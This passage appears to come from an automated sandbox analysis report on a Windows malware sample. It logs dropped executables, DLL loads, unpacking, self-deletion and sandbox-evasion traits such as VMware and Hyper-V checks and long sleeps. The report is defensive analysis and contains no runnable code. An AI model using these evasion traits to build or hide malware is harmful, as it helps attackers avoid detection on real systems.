      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: Binary string: ntdll.pdb source: 70C1.exe, 00000006.00000002.2419427291.000001CD107C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419568092.000001CD109CC000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420364973.000001CD111C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418138051.000001CD0F9C9000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417727396.000001CD0F5C8000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418875310.000001CD101C1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421444762.000001CD11BCD000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417555234.000001CD0F3CF000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2416835332.000001CD0EDCF000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421255150.000001CD119C7000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417004078.000001CD0EFC2000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420171669.000001CD10FCA000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417924534.000001CD0F7C4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420564826.000001CD113CE000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418324178.000001CD0FBC4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417355522.000001CD0F1C1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419945194.000001CD10DC1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419145203.000001CD103C2000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418675219.000001CD0FFC4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421629080.000001CD11DC1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421043779.000001CD117C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418494622.000001CD0FDC8000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419281806.000001CD105CB000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419745402.000001CD10BC6000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420797717.000001CD115CB000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2493490885.00000253644CC000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2492962721.00000253642C5000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2492406389.0000025363ECF000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2490286144.00000253638C6000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2494767463.00000253650C3000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2495732723.000
      Source: Binary string: ntdll.pdbUGP source: 70C1.exe, 00000006.00000002.2419427291.000001CD107C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419568092.000001CD109CC000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420364973.000001CD111C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418138051.000001CD0F9C9000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417727396.000001CD0F5C8000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418875310.000001CD101C1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421444762.000001CD11BCD000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417555234.000001CD0F3CF000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2416835332.000001CD0EDCF000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421255150.000001CD119C7000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417004078.000001CD0EFC2000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420171669.000001CD10FCA000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417924534.000001CD0F7C4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420564826.000001CD113CE000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418324178.000001CD0FBC4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417355522.000001CD0F1C1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419945194.000001CD10DC1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419145203.000001CD103C2000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418675219.000001CD0FFC4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421629080.000001CD11DC1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421043779.000001CD117C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418494622.000001CD0FDC8000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419281806.000001CD105CB000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419745402.000001CD10BC6000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420797717.000001CD115CB000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2493490885.00000253644CC000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2492962721.00000253642C5000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2492406389.0000025363ECF000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2490286144.00000253638C6000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2494767463.00000253650C3000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2495732723.

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeUnpacked PE file: 0.2.n72I7qB2ss.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\ashcvvsUnpacked PE file: 5.2.ashcvvs.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_00407585 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,9_2_00407585
      Source: 70C1.exe.1.drStatic PE information: real checksum: 0x1ffb2a should be: 0x203a91
      Source: AA31.exe.1.drStatic PE information: real checksum: 0x2008dc should be: 0x204843
      Source: AA31.exe.1.drStatic PE information: section name: .xdata
      Source: 70C1.exe.1.drStatic PE information: section name: .xdata
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_00403230 push eax; ret 0_2_00403302
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_004026FF push ecx; ret 0_2_0040270B
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_005D168F push esi; retf 0_2_005D16BC
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_005D2766 push ecx; ret 0_2_005D2772
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_0065FB65 push ss; retf 0_2_0065FB78
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_00660F2D pushad ; retf 0_2_00660FA6
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_00660F0E pushad ; retf 0_2_00660FA6
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_0065F7C1 push edi; retf 0_2_0065F7CC
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_0065FBA6 push ss; retf 0_2_0065FB78
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_0065F787 push edi; retf 0_2_0065F7CC
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_00403230 push eax; ret 5_2_00403302
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_004026FF push ecx; ret 5_2_0040270B
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_006D168F push esi; retf 5_2_006D16BC
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_006D2766 push ecx; ret 5_2_006D2772
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_006FE855 pushad ; retf 5_2_006FE8CE
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_006FE836 pushad ; retf 5_2_006FE8CE
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_006FD0E9 push edi; retf 5_2_006FD0F4
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_006FD4CE push ss; retf 5_2_006FD4A0
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_006FD0AF push edi; retf 5_2_006FD0F4
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_006FD48D push ss; retf 5_2_006FD4A0
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_00403399 push ecx; ret 9_2_004033AC
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\AA31.exeJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ashcvvsJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\70C1.exeJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ashcvvsJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\n72i7qb2ss.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ashcvvs:Zone.Identifier read attributes | deleteJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\ashcvvsAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\ashcvvsAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: ashcvvs, 00000005.00000002.2060813852.00000000006EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKN
      Source: n72I7qB2ss.exe, 00000000.00000002.1769033987.000000000064E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 449Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2747Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 987Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2077Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 879Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877Jump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsAPI coverage: 5.3 %
      Source: C:\Windows\explorer.exe TID: 7164Thread sleep count: 449 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5104Thread sleep count: 2747 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5104Thread sleep time: -274700s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 6148Thread sleep count: 987 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6148Thread sleep time: -98700s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 2692Thread sleep count: 275 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2416Thread sleep count: 270 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6104Thread sleep count: 277 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5104Thread sleep count: 2077 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5104Thread sleep time: -207700s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exe TID: 4632Thread sleep time: -50840s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\70C1.exe TID: 6656Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exe TID: 2336Thread sleep time: -76296s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\AA31.exe TID: 6840Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_0042379F GetSystemTimes followed by cmp: cmp dword ptr [0043a3ach], 0ah and CTI: jne 00423993h0_2_0042379F
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 5_2_0042379F GetSystemTimes followed by cmp: cmp dword ptr [0043a3ach], 0ah and CTI: jne 00423993h5_2_0042379F
      Source: C:\Users\user\AppData\Roaming\ashcvvsCode function: 9_2_0042379F GetSystemTimes followed by cmp: cmp dword ptr [0043a3ach], 0ah and CTI: jne 00423993h9_2_0042379F
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeCode function: 0_2_0042379F GetLogicalDriveStringsW,DeleteVolumeMountPointW,GetCommandLineA,lstrcatW,InterlockedExchange,GetActiveWindow,GetSystemWindowsDirectoryW,WriteConsoleW,IntersectRect,FlushInstructionCache,GetAtomNameA,GlobalDeleteAtom,GetCurrentConsoleFont,SearchPathA,GetDefaultCommConfigA,DebugBreak,EnumDateFormatsW,SetCommMask,GetTickCount,GetSystemTimes,FoldStringW,OpenWaitableTimerA,HeapLock,FormatMessageW,GlobalAlloc,LoadLibraryA,0_2_0042379F
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeCode function: 7_2_00007FF65B154F94 GetSystemInfo,7_2_00007FF65B154F94
      Source: explorer.exe, 00000001.00000000.1751055760.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1750648090.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000001.00000000.1750648090.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
      Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
      Source: explorer.exe, 00000001.00000000.1751055760.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1748144238.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
      Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.1751055760.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: AA31.exe, 00000007.00000002.2487058205.00000253616F3000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000003.2475479688.00000253616F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm
      Source: explorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
      Source: AA31.exe, 00000007.00000002.2486672501.000002536167C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
      Source: explorer.exe, 00000001.00000000.1750648090.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
      Source: explorer.exe, 00000001.00000000.1750648090.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1750648090.000000000982D000.00000004.00000001.00020000.00000000.sdmp, 70C1.exe, 00000006.00000003.2401956782.000001CD0D2A5000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2415753846.000001CD0D22C000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2416056931.000001CD0D2A5000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2487058205.00000253616F3000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000003.2475479688.00000253616F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000001.00000000.1751055760.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
      Source: explorer.exe, 00000001.00000000.1750648090.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
      Source: explorer.exe, 00000001.00000000.1748144238.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000001.00000000.1748144238.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeAPI call chain: ExitProcess graph end nodegraph_6-1338
      Source: C:\Users\user\AppData\Local\Temp\70C1.exeAPI call chain: ExitProcess graph end nodegraph_6-1262
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4368
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4318
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4155
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4258
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4366
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4192
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4667
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4315
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4447
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4452
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4901
      Source: C:\Users\user\AppData\Local\Temp\AA31.exeAPI call chain: ExitProcess graph end nodegraph_7-4064
